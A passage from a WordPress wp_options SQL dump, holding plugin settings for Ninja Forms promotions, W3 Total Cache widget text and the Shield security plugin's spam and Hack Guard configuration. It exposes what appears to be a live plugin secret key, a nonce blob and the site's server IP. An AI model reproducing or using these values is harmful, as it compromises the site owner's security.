20:07:08','yes'),(439283,'hustle_settings','a:0:{}','yes'),(439286,'hustle_430_modules_to_migrate','a:0:{}','no'),(439270,'GOTMLS_nonce_blob','YToxOntzOjMyOiIyNDYwMjA=ZmI2YTJjODgwOTlkNThlMWZlODk3ZDU5ZCI7ZDo=MjYxMzQ7fQ3','yes'),(439304,'ninja-forms-views-secret','nYl0owfWSRtWjh6aq6EprNyK29u3qZ5ZeNWzWVmy','yes'),(439305,'gravityformsaddon_gfmc_version','3.2.1','yes'),(439310,'nf_active_promotions','{\"dashboard\":[{\"id\":\"personal-20\",\"location\":\"dashboard\",\"type\":\"personal\",\"content\":\"<a href=\\\"https:\\/\\/ninjaforms.com\\/personal-membership\\/?utm_source=ninja-forms-plugin&utm_medium=dashboard-banner-ad&utm_campaign=personal-banner-ad&utm_content=personal-20\\\" target=\\\"_blank\\\" class=\\\"nf-remove-promo-styling\\\"><img src=\\\"http:\\/\\/zphiblgz.org\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/img\\/promotions\\/dashboard-banner-personal-20.png\\\"><\\/a>\",\"script\":\"\"},{\"id\":\"personal-50\",\"location\":\"dashboard\",\"type\":\"personal\",\"content\":\"<a href=\\\"https:\\/\\/ninjaforms.com\\/personal-membership\\/?utm_source=ninja-forms-plugin&utm_medium=dashboard-banner-ad&utm_campaign=personal-banner-ad&utm_content=personal-50\\\" target=\\\"_blank\\\" class=\\\"nf-remove-promo-styling\\\"><img src=\\\"http:\\/\\/zphiblgz.org\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/img\\/promotions\\/dashboard-banner-personal-50.png\\\"><\\/a>\",\"script\":\"\"},{\"id\":\"sendwp-banner\",\"location\":\"dashboard\",\"content\":\"<span aria-label=\\\"SendWP. Getting WordPress email into an inbox shouldn\'t be that hard! Never miss another receipt, form submission, or any WordPress email ever again.\\\" style=\\\"cursor:pointer;width:800px;height:83px;border-radius:4px;-moz-border-radius:4px;-webkit-border-radius:4px;background-image:url(\'http:\\/\\/zphiblgz.org\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/img\\/promotions\\/dashboard-banner-sendwp.png\');display:block;\\\"><\\/span>\",\"type\":\"sendwp\",\"script\":\"\\n      setTimeout(function(){ \\/* Wait for services to init. *\\/\\n        var data = {\\n          width: 450,\\n          closeOnClick: \'body\',\\n          closeOnEsc: true,\\n          content: \'<p><h2>Frustrated that WordPress email isn\\u2019t being received?<\\/h2><p>Form submission notifications not hitting your inbox? Some of your visitors getting form feedback via email, others not? By default, your WordPress site sends emails through your web host, which can be unreliable. Your host has spent lots of time and money optimizing to serve your pages, not send your emails.<\\/p><h3>Sign up for SendWP today, and never deal with WordPress email issues again!<\\/h3><p>SendWP is an email service that removes your web host from the email equation.<\\/p><ul style=&quot;list-style-type:initial;margin-left: 20px;&quot;><li>Sends email through dedicated email service, increasing email deliverability.<\\/li><li>Keeps form submission emails out of spam by using a trusted email provider.<\\/li><li>On a shared web host? Don\\u2019t worry about emails being rejected because of blocked IP addresses.<\\/li><li><strong>$1 for the first month. $9\\/month after. Cancel anytime!<\\/strong><\\/li><\\/ul><\\/p><br \\/>\',\\n          btnPrimary: {\\n            text: \'Sign me up!\',\\n            callback: function() {\\n              var spinner = document.createElement(\'span\');\\n              spinner.classList.add(\'dashicons\', \'dashicons-update\', \'dashicons-update-spin\');\\n              var w = this.offsetWidth;\\n              this.innerHTML = spinner.outerHTML;\\n              this.style.width = w+\'px\';\\n              ninja_forms_sendwp_remote_install();\\n            }\\n          },\\n          btnSecondary: {\\n            text: \'Cancel\',\\n            callback: function() {\\n              sendwpModal.toggleModal(false);\\n            }\\n          }\\n        }\\n        var sendwpModal = new NinjaModal(data);\\n      }, 500);\\n    \"}]}','no'),(439251,'duplicator_lite_inst_hash_notice','1','yes'),(439252,'duplicator_new_storage_position','1','yes'),(510496,'_transient_timeout_w3tc.verify_plugins','1632922884','no'),(439261,'w3tc_generic_widgetservices','{\"content\":{\"items\":[{\"name\":\"Premium Support Response (Usually <1h First Response)\",\"parameter_name\":\"field4\",\"parameter_value\":\"Premium Support Response (Usually <1h First Response)\",\"form_hash\":\"m5pom8z0qy59rm\"},{\"name\":\"Performance Audit \\/ Consult (Theme, Plugin, Content, Server)\",\"parameter_name\":\"field4\",\"parameter_value\":\"Performance Audit \\/ Consult (Theme, Plugin, Content, Server)\",\"form_hash\":\"m5pom8z0qy59rm\"},{\"name\":\"Plugin Configuration\",\"parameter_name\":\"field4\",\"parameter_value\":\"Plugin Configuration\",\"form_hash\":\"m5pom8z0qy59rm\"},{\"name\":\"SSL Performance Setup\",\"parameter_name\":\"field4\",\"parameter_value\":\"SSL Performance Setup\",\"form_hash\":\"m5pom8z0qy59rm\"},{\"name\":\"Full Site Delivery Setup\",\"parameter_name\":\"field4\",\"parameter_value\":\"Full Site Delivery Setup\",\"form_hash\":\"m5pom8z0qy59rm\"},{\"name\":\"Hosting Environment Troubleshooting\",\"parameter_name\":\"field4\",\"parameter_value\":\"Hosting Environment Troubleshooting\",\"form_hash\":\"m5pom8z0qy59rm\"},{\"name\":\"Performance Monitoring\",\"parameter_name\":\"field4\",\"parameter_value\":\"Performance Monitoring\",\"form_hash\":\"m5pom8z0qy59rm\"}],\"ui_strings\":{\"cdn.maxcdn.signUpAndSave\":\"Sign Up Now and save !\",\"cdn.maxcdn.signUpAndSave.description\":\"MaxCDN is a service that lets you speed up your site even more with W3 Total Cache. Sign up now to recieve a special offer!\",\"cdn.stackpath.signUpAndSave\":\"Sign Up Now and save !\",\"cdn.stackpath.signUpAndSave.description\":\"StackPath is a service that lets you speed up your site even more with W3 Total Cache. Sign up now and save!\",\"cdn.stackpath2.signUpAndSave\":\"Sign Up Now and save !\",\"cdn.stackpath2.signUpAndSave.description\":\"StackPath is a service that lets you speed up your site even more with W3 Total Cache. Sign up now to recieve a special offer!\",\"minify.general.header\":\"Reduce load time by decreasing the size and number of <acronym title=\'Cascading Style Sheet\'>CSS<\\/acronym> and <acronym title=\'JavaScript\'>JS<\\/acronym> files. Automatically remove unncessary data from <acronym title=\'Cascading Style Sheet\'>CSS<\\/acronym>, <acronym title=\'JavaScript\'>JS<\\/acronym>, feed, page and post <acronym title=\'Hypertext Markup Language\'>HTML<\\/acronym>.\",\"newrelic.general.header\":\"New Relic may not be installed or not active on this server. <a href=\'%s\' target=\'_blank\'>Sign up for a (free) account<\\/a>. Visit <a href=\'%s\' target=\'_blank\'>New Relic<\\/a> for installation instructions.\",\"reverseproxy.general.header\":\"A reverse proxy adds scale to an server by handling requests before WordPress does. Purge settings are set on the <a href=\'%s\'>Page Cache settings<\\/a> page and <a href=\'%s\'>Browser Cache settings<\\/a> are set on the browser cache settings page.\",\"cdnfsd.general.header\":\"Host the entire website with your compatible <acronym title=\'Content Delivery Network\'>CDN<\\/acronym> provider to reduce page load time.\",\"cdn.general.header\":\"Host static files with your <acronym title=\'Content Delivery Network\'>CDN<\\/acronym> to reduce page load time.\",\"cdn.stackpath.widget.existing\":\"If you\'re an existing StackPath customer, enable <acronym title=\'Content Delivery Network\'>CDN<\\/acronym> and:\",\"cdn.stackpath2.widget.existing\":\"If you\'re an existing StackPath customer, enable <acronym title=\'Content Delivery Network\'>CDN<\\/acronym> and:\",\"cdn.stackpath2.widget.works_magically\":\"StackPath works magically with W3 Total Cache.\",\"cdn.stackpath.widget.header\":\"Dramatically increase website speeds in just a few clicks! Add the StackPath content delivery network (<acronym title=\'Content Delivery Network\'>CDN<\\/acronym>) service to your site.\",\"cdn.stackpath2.widget.header\":\"Dramatically increase website speeds in just a few clicks! Add the StackPath content delivery network (<acronym title=\'Content Delivery Network\'>CDN<\\/acronym>) service to your site.\"}},\"expires\":1612308108}','no'),(420383,'shield_mod_config_61c66b862e8c5cd5445f87065a9efffb','a:7:{s:4:\"slug\";s:15:\"comments_filter\";s:10:\"properties\";a:14:{s:4:\"slug\";s:15:\"comments_filter\";s:4:\"name\";s:13:\"Comments SPAM\";s:12:\"sidebar_name\";s:4:\"SPAM\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:14:\"commentsfilter\";s:7:\"tagline\";s:42:\"Block comment SPAM and retain your privacy\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:0;s:19:\"run_if_verified_bot\";b:0;s:12:\"run_if_wpcli\";b:0;s:5:\"order\";i:50;}s:13:\"admin_notices\";a:1:{s:15:\"akismet-running\";a:4:{s:2:\"id\";s:15:\"akismet-running\";s:12:\"plugin_admin\";s:3:\"yes\";s:16:\"plugin_page_only\";b:1;s:4:\"type\";s:7:\"warning\";}}s:8:\"sections\";a:6:{i:0;a:5:{s:4:\"slug\";s:42:\"section_bot_comment_spam_protection_filter\";s:5:\"title\";s:44:\"Automatic Bot Comment SPAM Protection Filter\";s:11:\"title_short\";s:8:\"Bot SPAM\";s:7:\"primary\";b:1;s:7:\"summary\";a:2:{i:0;s:66:\"Purpose - Blocks 100% of all automated bot-generated comment SPAM.\";i:1;s:57:\"Recommendation - Use of this feature is highly recommend.\";}}i:1;a:4:{s:4:\"slug\";s:25:\"section_human_spam_filter\";s:5:\"title\";s:36:\"Human Comment SPAM Protection Filter\";s:11:\"title_short\";s:10:\"Human SPAM\";s:7:\"summary\";a:2:{i:0;s:78:\"Purpose - Uses a 3rd party SPAM dictionary to detect human-based comment SPAM.\";i:1;s:176:\"Recommendation - Use of this feature is highly recommend.This tool, unlike other SPAM tools such as Akismet, will not send your comment data to 3rd party services for analysis.\";}}i:2;a:4:{s:4:\"slug\";s:31:\"section_bot_comment_spam_common\";s:5:\"title\";s:37:\"Common Settings For All SPAM Scanning\";s:11:\"title_short\";s:15:\"Common Settings\";s:7:\"summary\";a:1:{i:0;s:59:\"Purpose - Settings that apply to all comment SPAM scanning.\";}}i:3;a:4:{s:4:\"slug\";s:21:\"section_user_messages\";s:5:\"title\";s:32:\"Customize Messages Shown To User\";s:11:\"title_short\";s:16:\"Visitor Messages\";s:7:\"summary\";a:3:{i:0;s:51:\"Purpose - Customize the messages shown to visitors.\";i:1;s:70:\"Recommendation - Be sure to change the messages to suit your audience.\";i:2;s:75:\"Hint - To reset any message to its default, enter the text exactly: default\";}}i:4;a:4:{s:4:\"slug\";s:61:\"section_enable_plugin_feature_spam_comments_protection_filter\";s:5:\"title\";s:39:\"Enable Module: Comments SPAM Protection\";s:11:\"title_short\";s:14:\"Disable Module\";s:7:\"summary\";a:2:{i:0;s:126:\"Purpose - The Comments Filter can block 100% of automated spam bots and also offer the option to analyse human-generated spam.\";i:1;s:60:\"Recommendation - Keep the Comments Filter feature turned on.\";}}i:5;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:14:{i:0;a:10:{s:3:\"key\";s:22:\"enable_comments_filter\";s:7:\"section\";s:61:\"section_enable_plugin_feature_spam_comments_protection_filter\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/3z\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf04\";s:4:\"name\";s:22:\"Enable SPAM Protection\";s:7:\"summary\";s:55:\"Enable (or Disable) The Comments SPAM Protection module\";s:11:\"description\";s:83:\"Un-Checking this option will completely disable the Comments SPAM Protection module\";}i:1;a:10:{s:3:\"key\";s:25:\"trusted_commenter_minimum\";s:7:\"section\";s:31:\"section_bot_comment_spam_common\";s:7:\"default\";i:1;s:3:\"min\";i:1;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:19:\"https://shsec.io/fu\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:25:\"Trusted Commenter Minimum\";s:7:\"summary\";s:63:\"Minimum Number Of Approved Comments Before Commenter Is Trusted\";s:11:\"description\";s:117:\"Specify how many approved comments must exist before a commenter is trusted and their comments are no longer scanned.\";}i:2;a:10:{s:3:\"key\";s:18:\"trusted_user_roles\";s:7:\"section\";s:31:\"section_bot_comment_spam_common\";s:7:\"premium\";b:1;s:7:\"default\";a:5:{i:0;s:13:\"administrator\";i:1;s:6:\"editor\";i:2;s:6:\"author\";i:3;s:11:\"contributor\";i:4;s:10:\"subscriber\";}s:4:\"type\";s:5:\"array\";s:9:\"link_info\";s:19:\"https://shsec.io/fu\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:13:\"Trusted Users\";s:7:\"summary\";s:54:\"Don\'t Scan Comments For Users With The Following Roles\";s:11:\"description\";s:124:\"Shield doesn\'t normally scan comments from logged-in or registered users. Specify user roles here that shouldn\'t be scanned.\";}i:3;a:10:{s:3:\"key\";s:31:\"google_recaptcha_style_comments\";s:7:\"section\";s:42:\"section_bot_comment_spam_protection_filter\";s:7:\"default\";s:8:\"disabled\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:7:\"default\";s:4:\"text\";s:13:\"Default Style\";}i:2;a:2:{s:9:\"value_key\";s:5:\"light\";s:4:\"text\";s:11:\"Light Theme\";}i:3;a:2:{s:9:\"value_key\";s:4:\"dark\";s:4:\"text\";s:10:\"Dark Theme\";}i:4;a:2:{s:9:\"value_key\";s:9:\"invisible\";s:4:\"text\";s:9:\"Invisible\";}}s:9:\"link_info\";s:19:\"https://shsec.io/e4\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:7:\"CAPTCHA\";s:7:\"summary\";s:47:\"Enable CAPTCHA To Protect Against SPAM Comments\";s:11:\"description\";s:107:\"You can choose the CAPTCHA display format that best suits your site, including the newer Invisible CAPTCHA.\";}i:4;a:9:{s:3:\"key\";s:31:\"enable_comments_gasp_protection\";s:7:\"section\";s:42:\"section_bot_comment_spam_protection_filter\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/3n\";s:9:\"link_blog\";s:19:\"https://shsec.io/2n\";s:4:\"name\";s:15:\"GASP Protection\";s:7:\"summary\";s:22:\"Block Bot Comment SPAM\";s:11:\"description\";s:121:\"Taking the lead from the original GASP plugin for WordPress, we have extended it to include advanced spam-bot protection.\";}i:5;a:10:{s:3:\"key\";s:32:\"comments_default_action_spam_bot\";s:7:\"section\";s:42:\"section_bot_comment_spam_protection_filter\";s:7:\"default\";s:4:\"spam\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:4:{i:0;a:2:{s:9:\"value_key\";s:1:\"0\";s:4:\"text\";s:26:\"Move To Pending Moderation\";}i:1;a:2:{s:9:\"value_key\";s:4:\"spam\";s:4:\"text\";s:12:\"Move To SPAM\";}i:2;a:2:{s:9:\"value_key\";s:5:\"trash\";s:4:\"text\";s:13:\"Move To Trash\";}i:3;a:2:{s:9:\"value_key\";s:6:\"reject\";s:4:\"text\";s:18:\"Block And Redirect\";}}s:9:\"link_info\";s:19:\"https://shsec.io/6j\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:11:\"SPAM Action\";s:7:\"summary\";s:53:\"How To Categorise Comments When Identified To Be SPAM\";s:11:\"description\";s:118:\"When a comment is detected as being SPAM from an automatic bot, the comment will be categorised based on this setting.\";}i:6;a:9:{s:3:\"key\";s:33:\"enable_comments_human_spam_filter\";s:7:\"section\";s:25:\"section_human_spam_filter\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/57\";s:9:\"link_blog\";s:19:\"https://shsec.io/9w\";s:4:\"name\";s:17:\"Human SPAM Filter\";s:7:\"summary\";s:48:\"Enable (or Disable) The Human SPAM Filter module\";s:11:\"description\";s:145:\"Scans the content of WordPress comments for keywords that are indicative of SPAM and marks the comment according to your preferred setting below.\";}i:7;a:8:{s:3:\"key\";s:34:\"comments_default_action_human_spam\";s:7:\"section\";s:25:\"section_human_spam_filter\";s:7:\"default\";s:1:\"0\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:4:{i:0;a:2:{s:9:\"value_key\";s:1:\"0\";s:4:\"text\";s:26:\"Move To Pending Moderation\";}i:1;a:2:{s:9:\"value_key\";s:4:\"spam\";s:4:\"text\";s:12:\"Move To SPAM\";}i:2;a:2:{s:9:\"value_key\";s:5:\"trash\";s:4:\"text\";s:13:\"Move To Trash\";}i:3;a:2:{s:9:\"value_key\";s:6:\"reject\";s:4:\"text\";s:18:\"Block And Redirect\";}}s:4:\"name\";s:11:\"SPAM Action\";s:7:\"summary\";s:54:\"How To Categorise Comments When Identified To Be SPAM\'\";s:11:\"description\";s:119:\"When a comment is detected as being SPAM from a human commenter, the comment will be categorised based on this setting.\";}i:8;a:10:{s:3:\"key\";s:23:\"custom_message_checkbox\";s:7:\"section\";s:21:\"section_user_messages\";s:9:\"sensitive\";b:1;s:7:\"default\";s:7:\"default\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/3p\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:23:\"Custom Checkbox Message\";s:7:\"summary\";s:63:\"If you want a custom checkbox message, please provide this here\";s:11:\"description\";s:50:\"You can customise the message beside the checkbox.\";}i:9;a:10:{s:3:\"key\";s:20:\"custom_message_alert\";s:7:\"section\";s:21:\"section_user_messages\";s:9:\"sensitive\";b:1;s:7:\"default\";s:7:\"default\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/3p\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:20:\"Custom Alert Message\";s:7:\"summary\";s:60:\"If you want a custom alert message, please provide this here\";s:11:\"description\";s:101:\"This alert message is displayed when a visitor attempts to submit a comment without checking the box.\";}i:10;a:10:{s:3:\"key\";s:27:\"custom_message_comment_wait\";s:7:\"section\";s:21:\"section_user_messages\";s:9:\"sensitive\";b:1;s:7:\"default\";s:7:\"default\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/3p\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:19:\"Custom Wait Message\";s:7:\"summary\";s:74:\"If you want a custom submit-button wait message, please provide this here.\";s:11:\"description\";s:111:\"Where you see the \'%s\' this will be the number of seconds. You must ensure you include 1, and only 1, of these.\";}i:11;a:10:{s:3:\"key\";s:29:\"custom_message_comment_reload\";s:7:\"section\";s:21:\"section_user_messages\";s:9:\"sensitive\";b:1;s:7:\"default\";s:7:\"default\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/3p\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:21:\"Custom Reload Message\";s:7:\"summary\";s:90:\"If you want a custom message when the comment token has expired, please provide this here.\";s:11:\"description\";s:81:\"This message is displayed on the submit-button when the comment token is expired.\";}i:12;a:5:{s:3:\"key\";s:17:\"comments_cooldown\";s:7:\"section\";s:14:\"section_non_ui\";s:7:\"default\";i:10;s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";}i:13;a:4:{s:3:\"key\";s:16:\"human_spam_items\";s:7:\"section\";s:14:\"section_non_ui\";s:4:\"type\";s:5:\"array\";s:7:\"default\";a:6:{i:0;s:11:\"author_name\";i:1;s:12:\"author_email\";i:2;s:15:\"comment_content\";i:3;s:3:\"url\";i:4;s:10:\"ip_address\";i:5;s:10:\"user_agent\";}}}s:11:\"definitions\";a:3:{s:15:\"comments_expire\";i:1800;s:24:\"url_spam_blacklist_terms\";s:89:\"https://raw.githubusercontent.com/splorp/wordpress-comment-blacklist/master/blacklist.txt\";s:6:\"events\";a:3:{s:14:\"spam_block_bot\";a:2:{s:6:\"recent\";b:1;s:7:\"offense\";b:1;}s:20:\"spam_block_recaptcha\";a:2:{s:6:\"recent\";b:1;s:7:\"offense\";b:1;}s:16:\"spam_block_human\";a:2:{s:6:\"recent\";b:1;s:7:\"offense\";b:1;}}}s:10:\"meta_modts\";i:1611420210;}','yes'),(429645,'_site_transient_timeout_my_server_ips','1634934310','no'),(429646,'_site_transient_my_server_ips','a:3:{s:8:\"check_at\";i:1632342309;s:4:\"hash\";s:32:\"069bce8a49ca06b7c58d932e69f5f787\";s:3:\"ips\";a:1:{i:0;s:15:\"162.241.225.249\";}}','no'),(334240,'shield_mod_config_e369e9cb40794d44d1f25e99be9e9666','a:8:{s:4:\"slug\";s:12:\"hack_protect\";s:10:\"properties\";a:13:{s:4:\"slug\";s:12:\"hack_protect\";s:4:\"name\";s:10:\"Hack Guard\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:12:\"hack_protect\";s:7:\"tagline\";s:63:\"Automatically detect and repair vulnerable and suspicious items\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:5:\"order\";i:70;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:0;}s:10:\"menu_items\";a:1:{i:0;a:3:{s:5:\"title\";s:5:\"Scans\";s:4:\"slug\";s:14:\"scans-redirect\";s:8:\"callback\";s:0:\"\";}}s:16:\"custom_redirects\";a:1:{i:0;a:3:{s:15:\"source_mod_page\";s:14:\"scans-redirect\";s:15:\"target_mod_page\";s:8:\"insights\";s:10:\"query_args\";a:1:{s:4:\"inav\";s:5:\"scans\";}}}s:8:\"sections\";a:11:{i:0;a:4:{s:4:\"slug\";s:20:\"section_scan_options\";s:5:\"title\";s:12:\"Scan Options\";s:11:\"title_short\";s:8:\"Schedule\";s:7:\"summary\";a:1:{i:0;s:54:\"Purpose - Set how often the Hack Guard scans will run.\";}}i:1;a:5:{s:4:\"slug\";s:16:\"section_scan_wcf\";s:7:\"primary\";b:1;s:5:\"title\";s:27:\"WordPress Core File Scanner\";s:11:\"title_short\";s:20:\"WP Core File Scanner\";s:7:\"summary\";a:2:{i:0;s:100:\"Purpose - Regularly scan your WordPress core files for changes compared to official WordPress files.\";i:1;s:72:\"Recommendation - Keep the Core File Integrity Scanner feature turned on.\";}}i:2;a:4:{s:4:\"slug\";s:16:\"section_scan_ufc\";s:5:\"title\";s:26:\"Unrecognised Files Scanner\";s:11:\"title_short\";s:26:\"Unrecognised Files Scanner\";s:7:\"summary\";a:2:{i:0;s:84:\"Purpose - Scan your WordPress core folders for unrecognised files that don\'t belong.\";i:1;s:71:\"Recommendation - Keep the Unrecognised Files Scanner feature turned on.\";}}i:3;a:4:{s:4:\"slug\";s:16:\"section_scan_apc\";s:5:\"title\";s:22:\"Abandoned Plugin Check\";s:11:\"title_short\";s:22:\"Abandoned Plugin Check\";s:7:\"summary\";a:2:{i:0;s:96:\"Purpose - Regularly scan your WordPress plugins and themes for plugins that have been abandoned.\";i:1;s:125:\"Recommendation - Ensure this is turned on and you will always know if any of your assets have known security vulnerabilities.\";}}i:4;a:4:{s:4:\"slug\";s:16:\"section_realtime\";s:5:\"title\";s:19:\"Realtime Protection\";s:11:\"title_short\";s:19:\"Realtime Protection\";s:7:\"summary\";a:2:{i:0;s:61:\"Purpose - Provides realtime protection for certain key files.\";i:1;s:73:\"Recommendation - Keep realtime protection turned on to protect key files.\";}}i:5;a:4:{s:4:\"slug\";s:16:\"section_scan_mal\";s:5:\"title\";s:12:\"Malware Scan\";s:11:\"title_short\";s:12:\"Malware Scan\";s:7:\"summary\";a:2:{i:0;s:62:\"Purpose - Detect malicious changes to your themes and plugins.\";i:1;s:64:\"Recommendation - Keep the Plugins/Theme Guard feature turned on.\";}}i:6;a:5:{s:4:\"slug\";s:16:\"section_scan_ptg\";s:10:\"help_video\";a:3:{s:8:\"provider\";s:5:\"vimeo\";s:9:\"embed_url\";s:62:\"https://player.vimeo.com/video/256755089?color=3fde23&byline=0\";s:2:\"id\";s:9:\"256755089\";}s:5:\"title\";s:20:\"Plugins/Themes Guard\";s:11:\"title_short\";s:20:\"Plugins/Themes Guard\";s:7:\"summary\";a:2:{i:0;s:62:\"Purpose - Detect malicious changes to your themes and plugins.\";i:1;s:64:\"Recommendation - Keep the Plugins/Theme Guard feature turned on.\";}}i:7;a:4:{s:4:\"slug\";s:16:\"section_scan_wpv\";s:5:\"title\";s:21:\"Vulnerability Scanner\";s:11:\"title_short\";s:21:\"Vulnerability Scanner\";s:7:\"summary\";a:2:{i:0;s:94:\"Purpose - Regularly scan your WordPress plugins and themes for known security vulnerabilities.\";i:1;s:125:\"Recommendation - Ensure this is turned on and you will always know if any of your assets have known security vulnerabilities.\";}}i:8;a:4:{s:4:\"slug\";s:26:\"section_integrity_checking\";s:5:\"title\";s:16:\"Integrity Checks\";s:11:\"title_short\";s:16:\"Integrity Checks\";s:7:\"summary\";a:2:{i:0;s:58:\"Purpose - Monitor for unrecognised changes to your system.\";i:1;s:104:\"Recommendation - Enable these to automatically recover from unauthorized changes to your WordPress site.\";}}i:9;a:4:{s:4:\"slug\";s:51:\"section_enable_plugin_feature_hack_protection_tools\";s:5:\"title\";s:25:\"Enable Module: Hack Guard\";s:11:\"title_short\";s:14:\"Disable Module\";s:7:\"summary\";a:2:{i:0;s:94:\"Purpose - Hack Guard is a set of tools to warn you and protect you against hacks on your site.\";i:1;s:54:\"Recommendation - Keep the Hack Guard module turned on.\";}}i:10;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:33:{i:0;a:9:{s:3:\"key\";s:19:\"enable_hack_protect\";s:7:\"section\";s:51:\"section_enable_plugin_feature_hack_protection_tools\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:23:\"https://shsec.io/wpsf38\";s:9:\"link_blog\";s:19:\"https://shsec.io/9x\";s:4:\"name\";s:17:\"Enable Hack Guard\";s:7:\"summary\";s:41:\"Enable (or Disable) The Hack Guard Module\";s:11:\"description\";s:69:\"Un-Checking this option will completely disable the Hack Guard module\";}i:1;a:10:{s:3:\"key\";s:16:\"rt_file_wpconfig\";s:7:\"section\";s:14:\"section_non_ui\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:9:\"WP Config\";s:7:\"summary\";s:34:\"Lock WP Config Against Any Changes\";s:11:\"description\";s:80:\"As soon as changes are detected to the WP config file the file will be reverted.\";}i:2;a:11:{s:3:\"key\";s:18:\"enable_wpvuln_scan\";s:7:\"section\";s:16:\"section_scan_wpv\";s:7:\"premium\";b:1;s:7:\"default\";s:13:\"enabled_email\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:3:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:23:\"Automatic Scan Disabled\";}i:1;a:2:{s:9:\"value_key\";s:13:\"enabled_email\";s:4:\"text\";s:38:\"Scan Enabled - Send Email Notification\";}i:2;a:2:{s:9:\"value_key\";s:16:\"enabled_no_email\";s:4:\"text\";s:36:\"Scan Enabled - No Email Notification\";}}s:9:\"link_info\";s:19:\"https://shsec.io/du\";s:9:\"link_blog\";s:19:\"https://shsec.io/ah\";s:4:\"name\";s:21:\"Vulnerability Scanner\";s:7:\"summary\";s:32:\"Enable The Vulnerability Scanner\";s:11:\"description\";s:66:\"Scan all your WordPress assets for known security vulnerabilities.\";}i:3;a:10:{s:3:\"key\";s:22:\"wpvuln_scan_autoupdate\";s:7:\"section\";s:16:\"section_scan_wpv\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:17:\"Automatic Updates\";s:7:\"summary\";s:49:\"Apply Updates Automatically To Vulnerable Plugins\";s:11:\"description\";s:98:\"When an update becomes available, automatically apply updates to items with known vulnerabilities.\";}i:4;a:11:{s:3:\"key\";s:19:\"wpvuln_scan_display\";s:7:\"section\";s:16:\"section_scan_wpv\";s:7:\"default\";s:13:\"enabled_admin\";s:7:\"premium\";b:1;s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:3:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:16:\"Display Disabled\";}i:1;a:2:{s:9:\"value_key\";s:13:\"enabled_admin\";s:4:\"text\";s:15:\"Display Enabled\";}i:2;a:2:{s:9:\"value_key\";s:21:\"enabled_securityadmin\";s:4:\"text\";s:32:\"Display Only For Security Admins\";}}s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:17:\"Highlight Plugins\";s:7:\"summary\";s:28:\"Highlight Vulnerable Plugins\";s:11:\"description\";s:64:\"Vulnerable plugins will be highlighted on the main plugins page.\";}i:5;a:10:{s:3:\"key\";s:16:\"enabled_scan_apc\";s:7:\"section\";s:16:\"section_scan_apc\";s:7:\"default\";s:13:\"enabled_email\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:3:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:23:\"Automatic Scan Disabled\";}i:1;a:2:{s:9:\"value_key\";s:13:\"enabled_email\";s:4:\"text\";s:38:\"Scan Enabled - Send Email Notification\";}i:2;a:2:{s:9:\"value_key\";s:16:\"enabled_no_email\";s:4:\"text\";s:36:\"Scan Enabled - No Email Notification\";}}s:9:\"link_info\";s:19:\"https://shsec.io/ew\";s:9:\"link_blog\";s:19:\"https://shsec.io/eo\";s:4:\"name\";s:24:\"Abandoned Plugin Scanner\";s:7:\"summary\";s:35:\"Enable The Abandoned Plugin 